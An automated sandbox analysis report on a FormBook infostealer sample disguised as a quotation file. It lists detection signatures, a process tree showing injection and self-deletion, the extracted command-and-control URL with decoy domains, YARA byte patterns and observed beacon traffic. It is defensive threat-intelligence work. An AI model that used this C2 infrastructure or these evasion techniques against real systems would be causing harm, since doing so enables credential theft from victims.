Joe Sandbox Cloud Basic Analysis Report

Loading ...

Play interactive tourEdit tour

Windows Analysis Report QUOTATION LIST FOR NEW ORDER.exe

Overview

General Information

Sample Name:QUOTATION LIST FOR NEW ORDER.exe
Analysis ID:458798
MD5:2a28a3e032a65c25b90f193621b623af
SHA1:019659bb43b5535a9684d9938aa73e98682b0a61
SHA256:317613289fb0cce8c301f63922883b30d54bbcdf1cb01bfa772244e03a07dfda
Tags:exeFormbook
Infos:

Most interesting Screenshot:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
System process connects to network (likely due to code injection or exploit)
Yara detected FormBook
C2 URLs / IPs found in malware configuration
Initial sample is a PE file and has a suspicious name
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Tries to detect virtualization through RDTSC time measurements
Antivirus or Machine Learning detection for unpacked file
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Process Tree

  • System is w10x64
  • QUOTATION LIST FOR NEW ORDER.exe (PID: 5532 cmdline: 'C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exe' MD5: 2A28A3E032A65C25B90F193621B623AF)
    • QUOTATION LIST FOR NEW ORDER.exe (PID: 4760 cmdline: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exe MD5: 2A28A3E032A65C25B90F193621B623AF)
      • explorer.exe (PID: 3292 cmdline: C:\Windows\Explorer.EXE MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • cmmon32.exe (PID: 6056 cmdline: C:\Windows\SysWOW64\cmmon32.exe MD5: 2879B30A164B9F7671B5E6B2E9F8DFDA)
          • cmd.exe (PID: 6068 cmdline: /c del 'C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 5984 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.appackersandmoversbengaluru.com/p4se/"], "decoy": ["weightlossforprofessionals.com", "talkotstopandshop.com", "everesttechsolutions.com", "garboarts.com", "esubastas-online.com", "electriclastmile.com", "tomio.tech", "jacoty.com", "knot-tied-up.com", "energychoicesim.com", "rocketcompaniessham.com", "madarasapattinam.com", "promosplace.com", "newstarchurch.com", "thesaleskitchen.com", "slingmodeinc.com", "jobresulthub.com", "pillclk.com", "shipu119.com", "sibalcar.com", "quotovate.com", "bluecoyotecontracting.com", "hc68kr.com", "laundry39.com", "vietthaivt.com", "ikonflorida.com", "xn--sm2b97e.com", "innovisional.co.uk", "spacecityscouples.com", "slmccallum.com", "hro41.com", "theyardcardzstore.com", "primewildlife.com", "xn--seranderturzm-ebc.com", "stilesandhansen.com", "bvlesty.com", "hejiayin.com", "philosophersdojo.com", "aworldofsofas.com", "itile.net", "unitronicdealers.com", "savasoguz.com", "magetu.info", "devgmor.com", "villasabai.com", "pipipenguin.com", "furnishessentials.com", "patchmonitoring.com", "michaelhumphriesrealestate.com", "pratikahealth.com", "caswellcu.com", "lakeportal.com", "weedyourmind.com", "cardamommm.com", "freshstartrestorationllcmd.com", "mastercardbhdleon.com", "ceramiccottageco.com", "magiczneszkielka.com", "casebookconnet.com", "recharge.directory", "phoneprivacyscreen.com", "mumbaindicator.com", "jumboprovacy.com", "streamerdojo.com"]}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
0000000C.00000002.513637775.0000000000540000.00000004.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
    0000000C.00000002.513637775.0000000000540000.00000004.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
    • 0x85e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x8972:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x14685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x14171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x14787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x148ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0x938a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x133ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0xa102:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x19777:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1a81a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
    0000000C.00000002.513637775.0000000000540000.00000004.00000001.sdmpFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
    • 0x166a9:$sqlite3step: 68 34 1C 7B E1
    • 0x167bc:$sqlite3step: 68 34 1C 7B E1
    • 0x166d8:$sqlite3text: 68 38 2A 90 C5
    • 0x167fd:$sqlite3text: 68 38 2A 90 C5
    • 0x166eb:$sqlite3blob: 68 53 D8 7F 8C
    • 0x16813:$sqlite3blob: 68 53 D8 7F 8C
    0000000A.00000002.373559944.0000000000400000.00000040.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
      0000000A.00000002.373559944.0000000000400000.00000040.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
      • 0x85e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x8972:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x14685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
      • 0x14171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
      • 0x14787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
      • 0x148ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
      • 0x938a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
      • 0x133ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
      • 0xa102:$sequence_7: 66 89 0C 02 5B 8B E5 5D
      • 0x19777:$sequence_8: 3C 54 74 04 3C 74 75 F4
      • 0x1a81a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
      Click to see the 10 entries

      Unpacked PEs

      SourceRuleDescriptionAuthorStrings
      10.2.QUOTATION LIST FOR NEW ORDER.exe.400000.0.raw.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
        10.2.QUOTATION LIST FOR NEW ORDER.exe.400000.0.raw.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
        • 0x85e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x8972:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x14685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
        • 0x14171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
        • 0x14787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
        • 0x148ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
        • 0x938a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
        • 0x133ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
        • 0xa102:$sequence_7: 66 89 0C 02 5B 8B E5 5D
        • 0x19777:$sequence_8: 3C 54 74 04 3C 74 75 F4
        • 0x1a81a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
        10.2.QUOTATION LIST FOR NEW ORDER.exe.400000.0.raw.unpackFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
        • 0x166a9:$sqlite3step: 68 34 1C 7B E1
        • 0x167bc:$sqlite3step: 68 34 1C 7B E1
        • 0x166d8:$sqlite3text: 68 38 2A 90 C5
        • 0x167fd:$sqlite3text: 68 38 2A 90 C5
        • 0x166eb:$sqlite3blob: 68 53 D8 7F 8C
        • 0x16813:$sqlite3blob: 68 53 D8 7F 8C
        10.2.QUOTATION LIST FOR NEW ORDER.exe.400000.0.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
          10.2.QUOTATION LIST FOR NEW ORDER.exe.400000.0.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
          • 0x77e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x7b72:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x13885:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
          • 0x13371:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
          • 0x13987:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
          • 0x13aff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
          • 0x858a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
          • 0x125ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
          • 0x9302:$sequence_7: 66 89 0C 02 5B 8B E5 5D
          • 0x18977:$sequence_8: 3C 54 74 04 3C 74 75 F4
          • 0x19a1a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
          Click to see the 1 entries

          Sigma Overview

          No Sigma rule has matched

          Jbx Signature Overview

          Click to jump to signature section

          Show All Signature Results

          AV Detection:

          barindex
          Found malware configurationShow sources
          Source: 0000000C.00000002.513637775.0000000000540000.00000004.00000001.sdmpMalware Configuration Extractor: FormBook {"C2 list": ["www.appackersandmoversbengaluru.com/p4se/"], "decoy": ["weightlossforprofessionals.com", "talkotstopandshop.com", "everesttechsolutions.com", "garboarts.com", "esubastas-online.com", "electriclastmile.com", "tomio.tech", "jacoty.com", "knot-tied-up.com", "energychoicesim.com", "rocketcompaniessham.com", "madarasapattinam.com", "promosplace.com", "newstarchurch.com", "thesaleskitchen.com", "slingmodeinc.com", "jobresulthub.com", "pillclk.com", "shipu119.com", "sibalcar.com", "quotovate.com", "bluecoyotecontracting.com", "hc68kr.com", "laundry39.com", "vietthaivt.com", "ikonflorida.com", "xn--sm2b97e.com", "innovisional.co.uk", "spacecityscouples.com", "slmccallum.com", "hro41.com", "theyardcardzstore.com", "primewildlife.com", "xn--seranderturzm-ebc.com", "stilesandhansen.com", "bvlesty.com", "hejiayin.com", "philosophersdojo.com", "aworldofsofas.com", "itile.net", "unitronicdealers.com", "savasoguz.com", "magetu.info", "devgmor.com", "villasabai.com", "pipipenguin.com", "furnishessentials.com", "patchmonitoring.com", "michaelhumphriesrealestate.com", "pratikahealth.com", "caswellcu.com", "lakeportal.com", "weedyourmind.com", "cardamommm.com", "freshstartrestorationllcmd.com", "mastercardbhdleon.com", "ceramiccottageco.com", "magiczneszkielka.com", "casebookconnet.com", "recharge.directory", "phoneprivacyscreen.com", "mumbaindicator.com", "jumboprovacy.com", "streamerdojo.com"]}
          Multi AV Scanner detection for submitted fileShow sources
          Source: QUOTATION LIST FOR NEW ORDER.exeVirustotal: Detection: 61%Perma Link
          Source: QUOTATION LIST FOR NEW ORDER.exeMetadefender: Detection: 37%Perma Link
          Source: QUOTATION LIST FOR NEW ORDER.exeReversingLabs: Detection: 63%
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 10.2.QUOTATION LIST FOR NEW ORDER.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 10.2.QUOTATION LIST FOR NEW ORDER.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0000000C.00000002.513637775.0000000000540000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000002.373559944.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000002.374153809.0000000000B80000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000C.00000002.515171970.0000000003040000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000002.374626991.00000000010B0000.00000040.00000001.sdmp, type: MEMORY
          Machine Learning detection for sampleShow sources
          Source: QUOTATION LIST FOR NEW ORDER.exeJoe Sandbox ML: detected
          Source: 10.2.QUOTATION LIST FOR NEW ORDER.exe.400000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: QUOTATION LIST FOR NEW ORDER.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
          Source: QUOTATION LIST FOR NEW ORDER.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
          Source: Binary string: wscui.pdbUGP source: explorer.exe, 0000000B.00000000.343228042.000000000E7F0000.00000002.00000001.sdmp
          Source: Binary string: wntdll.pdbUGP source: QUOTATION LIST FOR NEW ORDER.exe, 0000000A.00000002.374856007.000000000120F000.00000040.00000001.sdmp, cmmon32.exe, 0000000C.00000002.516057002.00000000048CF000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdb source: QUOTATION LIST FOR NEW ORDER.exe, 0000000A.00000002.374856007.000000000120F000.00000040.00000001.sdmp, cmmon32.exe
          Source: Binary string: wscui.pdb source: explorer.exe, 0000000B.00000000.343228042.000000000E7F0000.00000002.00000001.sdmp
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeCode function: 4x nop then pop ebx
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 4x nop then pop ebx

          Networking:

          barindex
          C2 URLs / IPs found in malware configurationShow sources
          Source: Malware configuration extractorURLs: www.appackersandmoversbengaluru.com/p4se/
          Source: global trafficHTTP traffic detected: GET /p4se/?RFQLn6=2dFdaDmhFhA0QZgP&-Zmt_=aCSsC2Wtvj0xQ8J4lkVrtXAo/y9YES1uuye3QtaBHWEeyHJ7dSrXHfQKVk1syv4zArANdeJ+Lg== HTTP/1.1Host: www.everesttechsolutions.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: Joe Sandbox ViewASN Name: PUBLIC-DOMAIN-REGISTRYUS PUBLIC-DOMAIN-REGISTRYUS
          Source: Joe Sandbox ViewASN Name: SUDDENLINK-COMMUNICATIONSUS SUDDENLINK-COMMUNICATIONSUS
          Source: global trafficHTTP traffic detected: GET /p4se/?RFQLn6=2dFdaDmhFhA0QZgP&-Zmt_=aCSsC2Wtvj0xQ8J4lkVrtXAo/y9YES1uuye3QtaBHWEeyHJ7dSrXHfQKVk1syv4zArANdeJ+Lg== HTTP/1.1Host: www.everesttechsolutions.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: unknownDNS traffic detected: queries for: www.everesttechsolutions.com
          Source: explorer.exe, 0000000B.00000000.341133083.000000000BE70000.00000002.00000001.sdmpString found in binary or memory: http://fontfabrik.com
          Source: QUOTATION LIST FOR NEW ORDER.exe, 00000000.00000003.261422144.00000000059F1000.00000004.00000001.sdmpString found in binary or memory: http://www.agfamonotype.
          Source: explorer.exe, 0000000B.00000000.341133083.000000000BE70000.00000002.00000001.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
          Source: explorer.exe, 0000000B.00000000.335006943.0000000006870000.00000004.00000001.sdmpString found in binary or memory: http://www.autoitscript.com/autoit3/J
          Source: QUOTATION LIST FOR NEW ORDER.exe, 00000000.00000003.247644835.00000000059F0000.00000004.00000001.sdmpString found in binary or memory: http://www.carterandcone.com
          Source: QUOTATION LIST FOR NEW ORDER.exe, 00000000.00000003.247860642.00000000059F1000.00000004.00000001.sdmpString found in binary or memory: http://www.carterandcone.com-sQE1s/
          Source: QUOTATION LIST FOR NEW ORDER.exe, 00000000.00000003.247860642.00000000059F1000.00000004.00000001.sdmpString found in binary or memory: http://www.carterandcone.comTC
          Source: QUOTATION LIST FOR NEW ORDER.exe, 00000000.00000003.247860642.00000000059F1000.00000004.00000001.sdmpString found in binary or memory: http://www.carterandcone.comh-s
          Source: explorer.exe, 0000000B.00000000.341133083.000000000BE70000.00000002.00000001.sdmpString found in binary or memory: http://www.carterandcone.coml
          Source: explorer.exe, 0000000B.00000000.341133083.000000000BE70000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com
          Source: QUOTATION LIST FOR NEW ORDER.exe, 00000000.00000003.255438854.00000000059D2000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com.TTF
          Source: QUOTATION LIST FOR NEW ORDER.exe, 00000000.00000003.255438854.00000000059D2000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/
          Source: explorer.exe, 0000000B.00000000.341133083.000000000BE70000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers
          Source: QUOTATION LIST FOR NEW ORDER.exe, 00000000.00000003.252461683.00000000059D2000.00000004.00000001.sdmp, QUOTATION LIST FOR NEW ORDER.exe, 00000000.00000003.252430930.00000000059F1000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/
          Source: explorer.exe, 0000000B.00000000.341133083.000000000BE70000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
          Source: explorer.exe, 0000000B.00000000.341133083.000000000BE70000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
          Source: QUOTATION LIST FOR NEW ORDER.exe, 00000000.00000003.253893243.00000000059CC000.00000004.00000001.sdmp, explorer.exe, 0000000B.00000000.341133083.000000000BE70000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
          Source: QUOTATION LIST FOR NEW ORDER.exe, 00000000.00000003.253053283.00000000059F1000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers6M
          Source: explorer.exe, 0000000B.00000000.341133083.000000000BE70000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
          Source: QUOTATION LIST FOR NEW ORDER.exe, 00000000.00000003.253270152.00000000059F1000.00000004.00000001.sdmp, QUOTATION LIST FOR NEW ORDER.exe, 00000000.00000003.254053171.00000000059F1000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers:
          Source: explorer.exe, 0000000B.00000000.341133083.000000000BE70000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
          Source: explorer.exe, 0000000B.00000000.341133083.000000000BE70000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
          Source: QUOTATION LIST FOR NEW ORDER.exe, 00000000.00000003.254053171.00000000059F1000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designersGN
          Source: QUOTATION LIST FOR NEW ORDER.exe, 00000000.00000003.252531304.00000000059F1000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designersZ
          Source: QUOTATION LIST FOR NEW ORDER.exe, 00000000.00000003.255121412.00000000059F1000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designersb
          Source: QUOTATION LIST FOR NEW ORDER.exe, 00000000.00000003.252461683.00000000059D2000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com9
          Source: QUOTATION LIST FOR NEW ORDER.exe, 00000000.00000003.255438854.00000000059D2000.00000004.00000001.sdmp, QUOTATION LIST FOR NEW ORDER.exe, 00000000.00000003.253917297.00000000059D2000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.comF
          Source: QUOTATION LIST FOR NEW ORDER.exe, 00000000.00000003.253917297.00000000059D2000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.comW.TTFk
          Source: QUOTATION LIST FOR NEW ORDER.exe, 00000000.00000003.252917416.00000000059D2000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.comY
          Source: QUOTATION LIST FOR NEW ORDER.exe, 00000000.00000003.252701033.00000000059D2000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.coma
          Source: QUOTATION LIST FOR NEW ORDER.exe, 00000000.00000003.255438854.00000000059D2000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.comals
          Source: QUOTATION LIST FOR NEW ORDER.exe, 00000000.00000003.255438854.00000000059D2000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.comalsd
          Source: QUOTATION LIST FOR NEW ORDER.exe, 00000000.00000003.254519056.00000000059D2000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.comcomF
          Source: QUOTATION LIST FOR NEW ORDER.exe, 00000000.00000003.253506597.00000000059D2000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.comcomd
          Source: QUOTATION LIST FOR NEW ORDER.exe, 00000000.00000003.253137868.00000000059D2000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.comd
          Source: QUOTATION LIST FOR NEW ORDER.exe, 00000000.00000003.255438854.00000000059D2000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.comd3
          Source: QUOTATION LIST FOR NEW ORDER.exe, 00000000.00000003.255438854.00000000059D2000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.comd:
          Source: QUOTATION LIST FOR NEW ORDER.exe, 00000000.00000003.253917297.00000000059D2000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.comessed
          Source: QUOTATION LIST FOR NEW ORDER.exe, 00000000.00000003.253917297.00000000059D2000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.comessed3
          Source: QUOTATION LIST FOR NEW ORDER.exe, 00000000.00000003.261741820.00000000059D2000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.comldF
          Source: QUOTATION LIST FOR NEW ORDER.exe, 00000000.00000003.261741820.00000000059D2000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.como
          Source: QUOTATION LIST FOR NEW ORDER.exe, 00000000.00000003.252567447.00000000059D2000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.como8
          Source: QUOTATION LIST FOR NEW ORDER.exe, 00000000.00000003.252461683.00000000059D2000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.comto
          Source: explorer.exe, 0000000B.00000000.341133083.000000000BE70000.00000002.00000001.sdmpString found in binary or memory: http://www.fonts.com
          Source: explorer.exe, 0000000B.00000000.341133083.000000000BE70000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn
          Source: explorer.exe, 0000000B.00000000.341133083.000000000BE70000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
          Source: explorer.exe, 0000000B.00000000.341133083.000000000BE70000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
          Source: QUOTATION LIST FOR NEW ORDER.exe, 00000000.00000003.257287203.00000000059D2000.00000004.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/
          Source: QUOTATION LIST FOR NEW ORDER.exe, 00000000.00000003.256992965.00000000059D2000.00000004.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/(
          Source: explorer.exe, 0000000B.00000000.341133083.000000000BE70000.00000002.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
          Source: explorer.exe, 0000000B.00000000.341133083.000000000BE70000.00000002.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
          Source: QUOTATION LIST FOR NEW ORDER.exe, 00000000.00000003.258690188.00000000059C8000.00000004.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htmO;
          Source: explorer.exe, 0000000B.00000000.341133083.000000000BE70000.00000002.00000001.sdmpString found in binary or memory: http://www.goodfont.co.kr
          Source: QUOTATION LIST FOR NEW ORDER.exe, 00000000.00000003.250650789.00000000059D2000.00000004.00000001.sdmp, QUOTATION LIST FOR NEW ORDER.exe, 00000000.00000003.248847065.00000000059D2000.00000004.00000001.sdmp, explorer.exe, 0000000B.00000000.341133083.000000000BE70000.00000002.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
          Source: QUOTATION LIST FOR NEW ORDER.exe, 00000000.00000003.249682670.00000000059D2000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/(
          Source: QUOTATION LIST FOR NEW ORDER.exe, 00000000.00000003.248847065.00000000059D2000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/3
          Source: QUOTATION LIST FOR NEW ORDER.exe, 00000000.00000003.249682670.00000000059D2000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/:
          Source: QUOTATION LIST FOR NEW ORDER.exe, 00000000.00000003.250297719.00000000059D2000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/G
          Source: QUOTATION LIST FOR NEW ORDER.exe, 00000000.00000003.249682670.00000000059D2000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/N
          Source: QUOTATION LIST FOR NEW ORDER.exe, 00000000.00000003.250650789.00000000059D2000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/Y
          Source: QUOTATION LIST FOR NEW ORDER.exe, 00000000.00000003.248847065.00000000059D2000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/Z
          Source: QUOTATION LIST FOR NEW ORDER.exe, 00000000.00000003.250650789.00000000059D2000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/jp/
          Source: QUOTATION LIST FOR NEW ORDER.exe, 00000000.00000003.250650789.00000000059D2000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/jp/(
          Source: QUOTATION LIST FOR NEW ORDER.exe, 00000000.00000003.250297719.00000000059D2000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/jp/:
          Source: QUOTATION LIST FOR NEW ORDER.exe, 00000000.00000003.250297719.00000000059D2000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/r
          Source: QUOTATION LIST FOR NEW ORDER.exe, 00000000.00000003.250297719.00000000059D2000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/s
          Source: QUOTATION LIST FOR NEW ORDER.exe, 00000000.00000003.249682670.00000000059D2000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/xS
          Source: explorer.exe, 0000000B.00000000.341133083.000000000BE70000.00000002.00000001.sdmpString found in binary or memory: http://www.sajatypeworks.com
          Source: explorer.exe, 0000000B.00000000.341133083.000000000BE70000.00000002.00000001.sdmpString found in binary or memory: http://www.sakkal.com
          Source: explorer.exe, 0000000B.00000000.341133083.000000000BE70000.00000002.00000001.sdmpString found in binary or memory: http://www.sandoll.co.kr
          Source: explorer.exe, 0000000B.00000000.341133083.000000000BE70000.00000002.00000001.sdmpString found in binary or memory: http://www.tiro.com
          Source: QUOTATION LIST FOR NEW ORDER.exe, 00000000.00000003.248396955.00000000059F2000.00000004.00000001.sdmpString found in binary or memory: http://www.tiro.comslnt
          Source: explorer.exe, 0000000B.00000000.341133083.000000000BE70000.00000002.00000001.sdmpString found in binary or memory: http://www.typography.netD
          Source: QUOTATION LIST FOR NEW ORDER.exe, 00000000.00000003.255135599.00000000059FA000.00000004.00000001.sdmpString found in binary or memory: http://www.urwpp.de
          Source: explorer.exe, 0000000B.00000000.341133083.000000000BE70000.00000002.00000001.sdmpString found in binary or memory: http://www.urwpp.deDPlease
          Source: QUOTATION LIST FOR NEW ORDER.exe, 00000000.00000003.255181502.00000000059FA000.00000004.00000001.sdmpString found in binary or memory: http://www.urwpp.dej
          Source: explorer.exe, 0000000B.00000000.341133083.000000000BE70000.00000002.00000001.sdmpString found in binary or memory: http://www.zhongyicts.com.cn

          E-Banking Fraud:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 10.2.QUOTATION LIST FOR NEW ORDER.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 10.2.QUOTATION LIST FOR NEW ORDER.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0000000C.00000002.513637775.0000000000540000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000002.373559944.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000002.374153809.0000000000B80000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000C.00000002.515171970.0000000003040000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000002.374626991.00000000010B0000.00000040.00000001.sdmp, type: MEMORY

          System Summary:

          barindex
          Malicious sample detected (through community Yara rule)Show sources
          Source: 10.2.QUOTATION LIST FOR NEW ORDER.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 10.2.QUOTATION LIST FOR NEW ORDER.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
